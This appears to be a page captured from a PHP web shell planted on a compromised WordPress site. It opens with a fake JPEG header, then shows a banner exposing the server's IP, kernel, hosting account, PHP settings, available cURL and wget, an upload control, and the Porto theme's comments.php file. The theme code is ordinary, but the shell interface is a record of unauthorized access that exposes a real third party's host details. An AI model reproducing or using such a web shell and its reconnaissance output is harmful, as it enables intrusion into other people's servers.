���� JFIF fdasasfas213sdaf
Server IP : 91.108.106.14 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/essartindia.com/public_html/wp-content/themes/porto/ |
Upload File : |
<?php global $porto_settings; defined( 'ABSPATH' ) || exit; if ( post_password_required() ) : ?> <p class="no-comments"><?php esc_html_e( 'This post is password protected. Enter the password to view comments.', 'porto' ); ?></p> <?php return; endif; if ( have_comments() ) : ?> <div class="post-block post-comments clearfix" id="comments"> <?php if ( isset( $porto_settings['post-title-style'] ) && 'without-icon' == $porto_settings['post-title-style'] ) : ?> <h4> <?php printf( _nx( 'Comment (1)', 'Comments (%1$s)', get_comments_number(), 'comments title', 'porto' ), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' ); ?> </h4> <?php else : ?> <h3><i class="far fa-comments"></i> <?php printf( _nx( 'Comment (1)', 'Comments (%1$s)', get_comments_number(), 'comments title', 'porto' ), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' ); ?> </h3> <?php endif; ?> <ul class="comments"> <?php // Comments list wp_list_comments( array( 'short_ping' => true, 'avatar_size' => 80, 'callback' => 'porto_comment', ) ); ?> </ul> <?php // Are there comments to navigate through? if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <div class="clearfix"> <div class="pagination" role="navigation"> <?php paginate_comments_links(); ?> </div> </div> <?php endif; // Check for comment navigation ?> <?php if ( ! comments_open() && get_comments_number() ) : ?> <p class="no-comments"><?php esc_html_e( 'Comments are closed.', 'porto' ); ?></p> <?php endif; ?> </div> <?php endif; // have_comments() ?> <?php comment_form(); ?>